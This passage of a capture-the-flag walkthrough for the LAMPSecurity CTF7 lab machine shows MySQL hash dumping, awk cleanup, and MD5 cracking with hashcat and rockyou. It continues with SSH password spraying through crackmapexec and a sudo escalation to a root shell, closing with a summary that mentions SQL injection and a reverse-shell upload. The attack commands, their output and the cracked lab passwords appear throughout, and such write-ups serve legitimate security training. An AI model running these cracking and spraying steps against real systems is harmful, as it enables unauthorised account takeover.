| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |
+-------------------------------+----------------------------------+
12 rows in set (0.00 sec)

mysql> 


Copy the usernames and hashes back to the attacking machine and clean them up with awk.

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat creds.lst  
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |


Use awk to pull out the usernames (the local part before the @, which is what a Linux account would be called) and write them to users.lst; this kind of fiddly text wrangling is routine red-team work.

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}'
[sudo] password for kali: 
brian@localhost.localdomain
john@localhost.localdomain
alice@localhost.localdomain
ruby@localhost.localdomain
leon@localhost.localdomain
julia@localhost.localdomain
michael@localhost.localdomain
bruce@localhost.localdomain
neil@localhost.localdomain
charles@localhost.localdomain
foo@bar.com
test@nowhere.com

                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}' | awk -F '@' '{print $1}'
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test

                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}' | awk -F '@' '{print $1}' > users.lst
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat users.lst 
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test

Extract the hashes.

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $4}'                                      
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6

                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $4}' > hash.lst     
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat hash.lst 
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6

Identify the hash type. 32 hex characters with no salt or prefix points to raw MD5 (hashcat mode 0); hash-identifier agrees.

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo hash-identifier 'e22f07b17f98e0d9d364584ced0e3c18'       
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))


Crack the MD5 hashes with hashcat (-m 0 is raw MD5, -a 0 is a straight dictionary attack against rockyou.txt). Unsalted MD5 means one hash computation per candidate covers all 12 digests at once, and 8 of 12 fall within seconds.

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo hashcat -m 0 -a 0 hash.lst /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 8845HS w/ Radeon 780M Graphics, 2913/5891 MB (1024 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 12 digests; 12 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

ed2539fe892d2c52c42a440354e8e3d5:madrid                   
4cb9c8a8048fd02294477fcb1a41191a:changeme                 
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234                 
098f6bcd4621d373cade4e832627b4f6:test                     
b2a97bcecbd9336b98d59d9324dae5cf:chuck33                  
2146bf95e8929874fc63d54f50f1d2e3:turtles77                
9c42a1346e333a770904b2a2b37fa7d3:somepassword             
e22f07b17f98e0d9d364584ced0e3c18:my2cents                 
Approaching final keyspace - workload adjusted.           

                                                          
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: hash.lst
Time.Started.....: Fri Sep 27 14:46:20 2024 (4 secs)
Time.Estimated...: Fri Sep 27 14:46:24 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4226.1 kH/s (0.12ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 8/12 (66.67%) Digests (total), 8/12 (66.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[212173657879616e67656c2121] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 29%

Started: Fri Sep 27 14:46:18 2024
Stopped: Fri Sep 27 14:46:25 2024


Clean the cracked passwords into password.lst. This throws away which hash (and therefore which user) each password belongs to, which is why the next step has to try every user against every password.

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat hashcat.result 
ed2539fe892d2c52c42a440354e8e3d5:madrid                   
4cb9c8a8048fd02294477fcb1a41191a:changeme                 
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234                 
098f6bcd4621d373cade4e832627b4f6:test                     
b2a97bcecbd9336b98d59d9324dae5cf:chuck33                  
2146bf95e8929874fc63d54f50f1d2e3:turtles77                
9c42a1346e333a770904b2a2b37fa7d3:somepassword             
e22f07b17f98e0d9d364584ced0e3c18:my2cents    
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat hashcat.result| awk -F ':' '{print$2}'                 
madrid                   
changeme                 
qwer1234                 
test                     
chuck33                  
turtles77                
somepassword             
my2cents    
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat hashcat.result| awk -F ':' '{print$2}' > password.lst
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat password.lst  
madrid                   
changeme                 
qwer1234                 
test                     
chuck33                  
turtles77                
somepassword             
my2cents 

Try the usernames against the passwords over SSH.

Trying each combination by hand is slow; a tool is far more efficient.

crackmapexec is mostly used in Active Directory engagements; here we only need its basic SSH mode.

Its raw output looks like this. To make it readable we later grep for lines containing a + sign, which marks a successful login.

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo crackmapexec ssh 192.168.50.156 -p password.lst -u users.lst --continue-on-success          
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing FTP protocol database
[*] Initializing SSH protocol database
[*] Initializing LDAP protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SSH         192.168.50.156  22     192.168.50.156   [*] SSH-2.0-OpenSSH_5.3
SSH         192.168.50.156  22     192.168.50.156   [-] brian:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:turtles77 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [+] brian:my2cents 
SSH         192.168.50.156  22     192.168.50.156   [-] john:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:turtles77 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:my2cents Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [+] alice:turtles77 
SSH         192.168.50.156  22     192.168.50.156   [-] alice:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:my2cents Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:turtles77 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:my2cents Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [+] leon:qwer1234 
SSH         192.168.50.156  22     192.168.50.156   [-] leon:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:turtles77 Authentication failed.

Use grep to show only the successes. Six of the eight cracked web-app passwords are also valid SSH passwords: these users reused the same password for the website and the operating system. foo and test only exist in the web application, so they never log in.

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo crackmapexec ssh 192.168.50.156 -p password.lst -u users.lst --continue-on-success | grep '+' 
SSH         192.168.50.156  22     192.168.50.156   [+] brian:my2cents 
SSH         192.168.50.156  22     192.168.50.156   [+] alice:turtles77 
SSH         192.168.50.156  22     192.168.50.156   [+] leon:qwer1234 
SSH         192.168.50.156  22     192.168.50.156   [+] julia:madrid 
SSH         192.168.50.156  22     192.168.50.156   [+] michael:somepassword 
SSH         192.168.50.156  22     192.168.50.156   [+] charles:chuck33

Switch to brian with the recovered password my2cents and check sudo rights: brian is (ALL) ALL, which means he can run any command as root.

mysql> exit
exit
Bye
bash-4.1$ su brian
su brian
Password: my2cents

[brian@bogon inc]$ whoami
whoami
brian
[brian@bogon inc]$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for brian: my2cents

Matching Defaults entries for brian on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brian may run the following commands on this host:
    (ALL) ALL


Get root

[brian@bogon inc]$ sudo /bin/bash
sudo /bin/bash
[root@bogon inc]# whoami
whoami
root
[root@bogon inc]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:9d:12:a9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.156/24 brd 192.168.50.255 scope global eth0
    inet6 fe80::20c:29ff:fe9d:12a9/64 scope link 
       valid_lft forever preferred_lft forever
[root@bogon inc]# 

Summary

Host scan: the interesting ports are 80 and 8080.
Brute-force the directories on port 80 (a CMS) with dirb.
Port 8080 is the CMS admin backend; log in through a SQL injection authentication bypass.
Upload a reverse shell via the backend and find where it lands in the assets directory found by dirbusting.
Once the shell is caught on Kali, upgrade it with Python's pty module.
Keep enumerating the box and find the database connection config file.
Log in to MySQL as root with an empty password.
Find the users table in the website database and get the usernames and password hashes.
Crack the hashes, spray them with crackmapexec, switch to user brian, and check the account's rights with sudo -l.
sudo /bin/bash starts a bash process as root, giving us the root shell.
Done

This article is a user submission; the views are the author's own and do not represent the site. If reposting, please credit the source: http://www.coloradmin.cn/o/2180861.html
